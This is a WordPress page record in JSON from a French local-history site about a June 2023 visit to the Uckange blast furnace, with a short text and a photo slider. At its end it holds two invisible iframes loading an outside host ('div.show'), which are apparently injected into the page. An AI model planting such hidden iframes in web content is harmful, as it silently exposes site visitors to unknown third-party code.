{"id":6999,"date":"2023-07-04T16:02:45","date_gmt":"2023-07-04T14:02:45","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6999"},"modified":"2023-07-04T16:05:05","modified_gmt":"2023-07-04T14:05:05","slug":"visite-haut-fourneau-uckange","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6999","title":{"rendered":"Visite du haut-fourneau d&rsquo;Uckange"},"content":{"rendered":"<h2>Vendredi 2 juin 2023<\/h2>\n<p>Comme un dinosaure endormi, il est l\u00e0, le haut-fourneau d\u2019Uckange, allong\u00e9 dans la friche. Il \u00e9coute le guide parler des jours actifs o\u00f9 les humains le faisaient gronder et ronronner. Ces humains de la \u00ab\u00a0Sid\u00e9\u00a0\u00bb si fiers de leur dangereux et dur m\u00e9tier et qui se croyaient les Ma\u00eetres du feu auquel ils payaient parfois un lourd tribu. Il faut aller visiter U4 pour comprendre tout un pass\u00e9 lorrain.<\/p>\n<div id=\"metaslider-id-6960\" style=\"width: 100%; margin: 0 auto;\" class=\"ml-slider-3-108-0 metaslider metaslider-responsive metaslider-6960 ml-slider has-dots-nav ms-theme-default\" role=\"region\" aria-label=\"Haut fourneau Uckange\" data-height=\"600\" data-width=\"800\">\n    <div id=\"metaslider_container_6960\">\n        <ul id='metaslider_6960' class='rslides'>\n            <li aria-roledescription='slide' aria-labelledby='slide-0'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B001.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B001-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6961 msDefaultImage\" title=\"B001\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-1'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B002.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B002-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6962 msDefaultImage\" title=\"B002\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-2'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B003.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B003-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6963 msDefaultImage\" title=\"B003\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-3'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B004.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B004-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6964 msDefaultImage\" title=\"B004\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-4'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B005.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B005-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6965 msDefaultImage\" title=\"B005\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-5'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B006.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B006-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6966 msDefaultImage\" title=\"B006\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-6'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B007.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B007-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6967 msDefaultImage\" title=\"B007\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-7'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B008.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B008-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6968 msDefaultImage\" title=\"B008\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-8'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B009.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B009-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6969 msDefaultImage\" title=\"B009\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-9'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B010.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B010-rotated-e1688478297377-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6970 msDefaultImage\" title=\"B010\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-10'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B011.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B011-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6971 msDefaultImage\" title=\"B011\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-11'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B012.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B012-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6972 msDefaultImage\" title=\"B012\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-12'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B013.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B013-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6973 msDefaultImage\" title=\"B013\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-13'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B014.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B014-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6974 msDefaultImage\" title=\"B014\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-14'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B015.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B015-rotated-e1688478339541-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6975 msDefaultImage\" title=\"B015\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-15'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B016.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B016-rotated-e1688478357797-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6976 msDefaultImage\" title=\"B016\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-16'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B017.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B017-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6977 msDefaultImage\" title=\"B017\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-17'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B018.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B018-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6978 msDefaultImage\" title=\"B018\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-18'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B019.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B019-rotated-e1688478066531-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6979 msDefaultImage\" title=\"B019\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-19'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B020.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B020-rotated-e1688478081367-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6980 msDefaultImage\" title=\"B020\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-20'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B021.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B021-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6981 msDefaultImage\" title=\"B021\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-21'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B022.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B022-rotated-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6982 msDefaultImage\" title=\"B022\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-22'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B023.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B023-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6983 msDefaultImage\" title=\"B023\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-23'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B024.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B024-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6984 msDefaultImage\" title=\"B024\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-24'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B025.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B025-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6985 msDefaultImage\" title=\"B025\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-25'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B026.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B026-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6986 msDefaultImage\" title=\"B026\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-26'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B027.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B027-rotated-e1688478120104-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6987 msDefaultImage\" title=\"B027\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-27'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B028.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B028-rotated-e1688478142690-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6988 msDefaultImage\" title=\"B028\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-28'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B029.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B029-rotated-e1688478157397-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6989 msDefaultImage\" title=\"B029\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-29'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B030.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B030-e1688478178808-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6990 msDefaultImage\" title=\"B030\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-30'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B031.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B031-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6991 msDefaultImage\" title=\"B031\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-31'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B032.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B032-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6992 msDefaultImage\" title=\"B032\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-32'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B033.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B033-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6993 msDefaultImage\" title=\"B033\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-33'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B034.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B034-rotated-e1688478240273-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6994 msDefaultImage\" title=\"B034\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-34'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B035.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B035-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6995 msDefaultImage\" title=\"B035\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-35'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B036.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B036-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6996 msDefaultImage\" title=\"B036\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-36'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B037.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B037-rotated-e1688478262103-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6997 msDefaultImage\" title=\"B037\" \/><\/a><\/li>\n            <li style='display: none;' aria-roledescription='slide' aria-labelledby='slide-37'><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B038.jpg\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2023\/07\/B038-800x600.jpg\" height=\"600\" width=\"800\" alt=\"\" class=\"slider-6960 slide-6998 msDefaultImage\" title=\"B038\" \/><\/a><\/li>\n        <\/ul>\n        \n    <\/div>\n<\/div>\n<p>Photos Claudine et G\u00e9rard Kester \u2013 Roger Mariotte<\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?page_id=6688\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-378\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/retour.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Vendredi 2 juin 2023 Comme un dinosaure endormi, il est l\u00e0, le haut-fourneau d\u2019Uckange, allong\u00e9 dans la friche. Il \u00e9coute le guide parler des jours actifs o\u00f9 les humains le faisaient gronder et ronronner. Ces humains de la \u00ab\u00a0Sid\u00e9\u00a0\u00bb si&hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":6688,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-6999","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6999","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6999"}],"version-history":[{"count":4,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6999\/revisions"}],"predecessor-version":[{"id":7004,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6999\/revisions\/7004"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/6688"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6999"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}